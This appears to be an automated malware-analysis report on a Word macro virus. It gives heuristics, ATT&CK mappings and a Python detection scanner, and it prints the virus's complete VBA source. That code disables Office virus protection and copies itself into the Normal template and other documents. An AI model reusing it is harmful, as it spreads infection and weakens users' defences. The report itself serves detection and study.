MALICIOUS
Risk Score: 150
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1137.001 Office Application Startup: Office Template Macros (persistence is through the Normal template's VBA project; the script writes no registry Run keys and touches no Startup folder, so T1547.001 does not apply to this sample)
- T1566.001 Phishing: Spearphishing Attachment
The sample is a Word document whose ThisDocument module carries a VBA macro virus. Its Document_Open and Document_Close handlers search the active document's module and the Normal template's module for a marker string (长安公司汽研所 常识课, "Changan Company Automotive Research Institute general knowledge class"), set Options.VirusProtection = False, and then use the VBE object model (CodeModule.DeleteLines followed by CodeModule.AddFromString) to copy the entire module between the two: an infected document writes itself into the Normal template (NormalTemplate.Save), and an infected Normal template writes itself into every clean document that is closed, so the code both persists and self-propagates. Document_Open only pre-clears the module on whichever side lacks the marker; the actual copying happens in Document_Close. The payload is a nuisance rather than a downloader: the script contains no network or shell code, but on the first day of the month it forces the user through a three-question quiz about the Changan Star car before infecting a document, and on a wrong final answer it saves the document as c:\lzc.vxd and closes it. The ClamAV signature, the heuristic firings and the script behavior agree that this is a macro-based threat, most plausibly delivered as a spearphishing attachment.
Heuristics (5)

- ClamAV: Doc.Trojan.Bptk-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Bptk-2.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): the document contains VBA macro code.
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): the VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Options.VirusProtection = False`. Note that the matched line is only the AV-tampering half of the rule; the replication half is the `CodeModule.DeleteLines` / `CodeModule.AddFromString` pair in Document_Close, visible in the script preview.
- Document_Open macro (low, OLE_VBA_DOCOPEN): an auto-executing Document_Open handler is present. Matched line in script: `Private Sub Document_Open()`.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that any Office file containing drawing markup carries; it is never contacted at run time, and the script itself has no network code.
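The OLE_VBA_MACRO_VIRUS_REPLICATION rule above describes its indicators in prose. The Python below is an added example, not the analyzer's own detection code, that implements that rule as a line-oriented scan over decoded VBA source (the kind olevba extracts) and applies the rule's and/or logic to reach a verdict. It runs on an excerpt of this sample's Document_Close handler condensed from the preview (marker checks and the quiz removed, the SaveAs line lifted out of its branch) and on a constructed benign macro for contrast. The indicator names, the regexes and the extra `saveas_nonoffice` signal are this example's own choices.

```python
import re
from dataclasses import dataclass

# Indicator patterns for VBA-project self-modification through the VBE object
# model and for macro-virus-protection tampering. The names and regexes are this
# example's own choices (assumption), not the analyzer's signature set.
INDICATORS = {
    "vbe_project_access": re.compile(r"\.VBProject\b", re.I),
    "codemodule_rewrite": re.compile(
        r"\.CodeModule\.(InsertLines|DeleteLines|AddFromString|ReplaceLine)\b", re.I),
    "organizer_copy": re.compile(r"\bOrganizerCopy\b", re.I),
    "normal_template_write": re.compile(r"\bNormalTemplate\.(Save|VBProject)\b", re.I),
    "virusprotection_off": re.compile(r"Options\.VirusProtection\s*=\s*False\b", re.I),
    "auto_exec": re.compile(
        r"\bSub\s+(Document_Open|Document_Close|AutoOpen|AutoClose|AutoExec|Workbook_Open)\b", re.I),
    # Saving the live document under a non-Office extension, as this sample does with c:\lzc.vxd
    "saveas_nonoffice": re.compile(r'\.SaveAs\s+"[^"]+\.(vxd|exe|dll|sys|scr)"', re.I),
}


@dataclass(frozen=True)
class Finding:
    indicator: str
    line_no: int   # 1-based line in the decoded VBA source
    line: str


def scan_vba(src: str) -> list[Finding]:
    """Scan decoded VBA source line by line and return every indicator hit."""
    findings = []
    for line_no, raw in enumerate(src.splitlines(), start=1):
        line = raw.strip()
        # Skip VBA comments so commented-out code does not fire the rule.
        if line.startswith("'") or line.lower().startswith("rem "):
            continue
        for name, rx in INDICATORS.items():
            if rx.search(line):
                findings.append(Finding(name, line_no, line))
    return findings


def classify(findings: list[Finding]) -> dict[str, bool]:
    """Apply the rule's and/or logic: rewriting another VBA project, or switching
    VirusProtection off, is enough on its own; an auto-exec handler alone is only
    a low-severity signal."""
    hit = {f.indicator for f in findings}
    rewrites_project = "codemodule_rewrite" in hit and (
        "vbe_project_access" in hit or "normal_template_write" in hit)
    rewrites_project = rewrites_project or "organizer_copy" in hit
    tampers_av = "virusprotection_off" in hit
    return {
        "macro_virus_replication": rewrites_project or tampers_av,
        "rewrites_vba_project": rewrites_project,
        "disables_virus_protection": tampers_av,
        "auto_exec_only": hit == {"auto_exec"},
    }


# Excerpt of this sample's Document_Close handler, condensed from the preview on
# this page (marker checks and quiz removed, SaveAs lifted out of its branch).
SAMPLE_VBA = """\
Private Sub Document_Close()
On Error Resume Next
Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
Options.VirusProtection = False
If DI And Not (TI) Then
Src = d.CodeModule.Lines(1, d.CodeModule.CountOfLines)
t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
t.CodeModule.AddFromString Src
NormalTemplate.Save
End If
ActiveDocument.SaveAs "c:\\lzc.vxd"
End Sub
"""

# Constructed benign control: an auto-exec handler with no project rewriting.
BENIGN_VBA = """\
Private Sub Document_Open()
' Options.VirusProtection = False   <- commented out, must not fire
MsgBox "Welcome"
End Sub
"""

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        hits = scan_vba(src)
        print(f"[{label}] {classify(hits)}")
        for f in hits:
            print(f"  line {f.line_no:>3} {f.indicator:<22} {f.line}")
```

To run this over a real file, feed it the output of `olevba --decode` (or `oletools.olevba.VBA_Parser(...).extract_macros()`) instead of the embedded excerpt; the scan is deliberately signature-free, so it fires on the behavior whether or not ClamAV knows the family.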
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3307 bytes | 6f2d80473bb19b94d68bab85120d8406847b6a042e7776c43e3523d5b7877108 |
Preview of the extracted script (the analyzer shows the first 1,000 lines; this script is 80 lines, so it appears in full). Comment lines beginning with `' [translation]` give the Chinese strings in English and are not part of the extracted source.

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim DI As Boolean, TI As Boolean, d As Object, t As Object, Src As String, r As String
Private Sub Document_Close()
On Error Resume Next
Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
' [translation] infection marker: "Changan Company Automotive Research Institute general knowledge class"
DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
Options.VirusProtection = False
' Document infected, Normal template clean: copy this module into the template
If DI And Not (TI) Then
Src = d.CodeModule.Lines(1, d.CodeModule.CountOfLines)
t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
t.CodeModule.AddFromString Src
NormalTemplate.Save
' Normal template infected, document clean: quiz on the 1st of the month, then copy the template's module into the document
ElseIf TI And Not (DI) Then
If Day(Now()) = 1 Then
Do
' [translation] "How long is the Changan Star car in metres? / A. 3.4 m  B. 3.5 m  C. 3.55 m  D. 3.7 m / Think it over!" (title: "Urgent question")
r = UCase(InputBox("长安之星车长多少米?" & Chr(13) & Chr(13) _
& "A.3米4 B.3米5 C.3米55 D.3米7" & Chr(13) & Chr(13) _
& "要好好思考哟!", "紧急提问"))
Loop Until r <> ""
If r = "B" Then
' [translation] "Great!"
MsgBox "好棒哟!"
GoTo 10
Else
' [translation] "Alas! One more chance."
MsgBox "唉!再给你一次机会."
Do
' [translation] "What type is the Changan Star FBA? / A. Standard  B. Ordinary  C. Deluxe / Think before you answer!"
r = UCase(InputBox("长安之星FBA是什么型?" & Chr(13) & Chr(13) _
& "A.标准型 B.普通型 C.豪华型" & Chr(13) & Chr(13) _
& "想好了再回答!", "紧急提问"))
Loop Until r <> ""
If r = "C" Then
' [translation] "Thank you for your support!"
MsgBox "谢谢你的支持!"
GoTo 10
Else
' [translation] "Idiot! This is your last chance."
MsgBox "笨蛋!给你最后一次机会."
Do
' [translation] "What is an airbag for? / A. Prevents collisions  B. Prevents skidding  C. Protects the driver in a crash / This is the last chance!"
r = UCase(InputBox("安全气囊是干什么用的?" & Chr(13) & Chr(13) _
& "A.防止撞车 B.防止侧滑 C.撞车时保护驾驶员" & Chr(13) & Chr(13) _
& "这是最后一次机会哟!", "紧急提问"))
Loop Until r <> ""
If r = "C" Then
' [translation] "Finally got it right!"
MsgBox "总算答对了!"
GoTo 10
Else
' [translation] "Looks like you still need to learn more about the Changan Star..."
MsgBox "看来你还需要对长安之星多加了解..."
ActiveDocument.SaveAs "c:\lzc.vxd"
ActiveDocument.Close
Exit Sub
End If
End If
End If
End If
10:
Src = t.CodeModule.Lines(1, t.CodeModule.CountOfLines)
d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
d.CodeModule.AddFromString Src
ActiveDocument.Save
End If
End Sub
Private Sub Document_Open()
On Error Resume Next
Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
Options.VirusProtection = False
' Clear the module on whichever side lacks the marker so Document_Close can overwrite it
If DI And Not (TI) Then
t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
ElseIf TI And Not (DI) Then
d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
End If
End Sub
```